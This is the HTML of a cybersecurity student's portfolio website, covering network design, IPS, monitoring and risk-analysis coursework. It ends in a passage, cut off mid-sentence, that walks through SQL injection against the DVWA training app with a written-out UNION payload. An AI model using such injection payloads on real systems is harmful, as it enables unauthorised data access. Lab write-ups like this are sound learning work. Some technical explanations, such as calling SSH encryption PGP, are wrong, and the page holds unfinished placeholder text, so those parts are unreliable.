          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
           </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#09796064496b6c6c626468677a276d6c7f"><span class="__cf_email__" data-cfemail="e191888ca18384848a8c808f92cf858497">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
          <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
          <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
           any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
